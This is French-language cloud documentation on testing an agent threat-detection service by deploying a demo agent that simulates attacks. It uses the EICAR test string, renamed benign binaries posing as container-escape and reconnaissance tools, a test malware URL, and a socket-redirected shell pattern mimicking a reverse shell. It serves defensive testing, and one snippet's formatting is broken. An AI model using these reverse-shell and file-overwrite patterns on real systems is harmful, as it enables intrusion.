Tester Agent Engine Threat Detection

Cette page explique comment vérifier que Agent Engine Threat Detection fonctionne en déclenchant intentionnellement des détecteurs et en vérifiant les résultats. Agent Engine Threat Detection est un service intégré de Security Command Center.

Avant de commencer

Pour détecter les menaces potentielles pour vos agents Vertex AI Agent Engine, assurez-vous que le service de détection des menaces Agent Engine est activé dans Security Command Center.

Configurer l'environnement

Pour tester Agent Engine Threat Detection, configurez un agent de démonstration qui simule une activité malveillante.

Créer un projet et activer le shell

Sélectionnez ou créez un projet Google Cloud à utiliser pour le test.

Pour tester les détecteurs, vous pouvez utiliser la console Google Cloud et Cloud Shell.

  1. Accédez à la consoleGoogle Cloud .

    Accéder à la console Google Cloud

  2. Sélectionnez le projet que vous utiliserez pour le test.

  3. Cliquez sur Activer Cloud Shell.

Vous pouvez également exécuter les instructions de test à partir d'un shell local.

Configurer Vertex AI Agent Engine

Si vous n'avez jamais utilisé Vertex AI Agent Engine dans ce projet, configurez l'environnement Vertex AI Agent Engine avant de commencer. Notez le nom du bucket de préproduction Cloud Storage que vous avez créé. Nous vous recommandons également de suivre le démarrage rapide de Vertex AI Agent Engine pour apprendre à développer et à déployer un agent avec le SDK Vertex AI.

Créer un script de test

Vous allez créer plusieurs fichiers qui seront utilisés pour déployer un nouvel agent à des fins de test. Pour cela, utilisez un éditeur de texte tel que nano.

  1. Créez un fichier nommé requirements.txt avec le contenu suivant.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Créez un fichier vide nommé installation_scripts/install.sh. Certains tests nécessitent d'ajouter du contenu à ce fichier.

  3. Créez un fichier nommé main.py avec le contenu suivant. Remplacez les variables PROJECT_ID, LOCATION et STAGING_BUCKET. Le nom du bucket intermédiaire doit inclure le préfixe gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Configurer l'environnement virtuel

  1. Créez et activez un environnement virtuel Python.

      python3 -m venv env
      source env/bin/activate
    
  2. Installez les dépendances nécessaires dans l'environnement virtuel.

    pip install -r requirements.txt
    

Tester le script

Exécutez le script depuis l'environnement virtuel avec python3 main.py. L'exécution de cette commande prendra plusieurs minutes pour compiler, déployer et exécuter l'agent de test.

Le script génère le nom de ressource de l'agent déployé, ainsi que quelques objets JSON, y compris une réponse LLM et d'autres métadonnées. Si vous rencontrez des erreurs d'autorisation ou de déploiement à cette étape, consultez la section Dépannage pour connaître la marche à suivre.

Tester les détecteurs

Pour tester les détecteurs Agent Engine Threat Detection, remplacez le code de la fonction threat_detection_test par un code qui simule une attaque. Le script peut prendre beaucoup de temps pour déployer l'agent et l'interroger. Pour accélérer les tests, vous pouvez combiner le contenu de plusieurs de ces fonctions.

Exécution : binaire malveillant ajouté exécuté

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Exécution : bibliothèque malveillante ajoutée chargée

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le. Vous pouvez recevoir une erreur du SDK Vertex AI concernant l'analyse de la réponse, mais le résultat est quand même généré.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Exécution : échappement de conteneur

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Exécution : exécution d'un outil d'attaque de Kubernetes

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Exécution : exécution d'un outil de reconnaissance local

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Exécution : binaire malveillant modifié exécuté

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Exécution : bibliothèque malveillante modifiée chargée

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

URL malveillante observée

Mettez à jour le fichier installation_scripts/install.sh avec le contenu suivant.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Interface système inversée

Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

Étapes suivantes